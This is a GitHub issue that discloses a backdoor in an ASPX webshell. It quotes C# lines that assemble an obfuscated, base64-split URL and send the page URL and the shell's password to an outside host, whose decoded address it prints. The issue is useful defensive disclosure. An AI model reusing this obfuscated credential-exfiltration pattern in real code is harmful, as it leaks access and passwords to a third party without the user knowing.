-
Notifications
You must be signed in to change notification settings - Fork 1k
Open
Description
Here is one I found.
Line 54 in f7cd87f
HttpWebRequest request = (HttpWebRequest)HttpWebRequest.Create(YfCnP + this.Request.Url.ToString() + pbzw + Password + ""); HttpWebResponse response = (HttpWebResponse)request.GetResponse(); |
Variable
YfCnP
is base64 encoded.Lines 39 to 49 in f7cd87f
string YfCnP = sh; | |
YfCnP += portble; | |
YfCnP += vcf; | |
YfCnP += dwgtg; | |
YfCnP += bin_data; | |
YfCnP += fuze; | |
YfCnP += ouj; | |
YfCnP += tprq; | |
YfCnP += idodr; | |
YfCnP += mtg; | |
YfCnP += ksgr; |
Lines 519 to 529 in f7cd87f
ksgr = Encoding.Default.GetString(Convert.FromBase64String(ksgr)); | |
mtg = Encoding.Default.GetString(Convert.FromBase64String(mtg)); | |
idodr = Encoding.Default.GetString(Convert.FromBase64String(idodr)); | |
tprq = Encoding.Default.GetString(Convert.FromBase64String(tprq)); | |
ouj = Encoding.Default.GetString(Convert.FromBase64String(ouj)); | |
fuze = Encoding.Default.GetString(Convert.FromBase64String(fuze)); | |
bin_data = Encoding.Default.GetString(Convert.FromBase64String(bin_data)); | |
dwgtg = Encoding.Default.GetString(Convert.FromBase64String(dwgtg)); | |
vcf = Encoding.Default.GetString(Convert.FromBase64String(vcf)); | |
portble = Encoding.Default.GetString(Convert.FromBase64String(portble)); | |
sh = Encoding.Default.GetString(Convert.FromBase64String(sh)); |
Line 2081 in f7cd87f
string sh = "aHR0"; |
Line 1724 in f7cd87f
string portble = "cDovLw=="; |
Line 1662 in f7cd87f
string vcf = "d3c="; |
Line 1561 in f7cd87f
string dwgtg = "dy50cm95"; |
Line 1495 in f7cd87f
string bin_data = "cGxhbi4="; |
Line 1466 in f7cd87f
string fuze = "Y29tL2FydGlj"; |
Line 1449 in f7cd87f
string ouj = "bGUvaQ=="; |
Line 1297 in f7cd87f
string tprq = "bmZvLw=="; |
Line 1179 in f7cd87f
string idodr = "Z2suYXM="; |
Line 589 in f7cd87f
string mtg = "cHg="; |
Line 499 in f7cd87f
string ksgr = "P25hbWU9"; |
Decode
YfCnP
:http://www.troyplan.com/article/info/gk.aspx?name=
Maybe there are more backdoors in webshells, use with caution.
Don't be evil.
ViCrack and ylyangElleFrederikMartim, PettterWang, Van-1337 and ViCrack
Metadata
Metadata
Assignees
Labels
No labels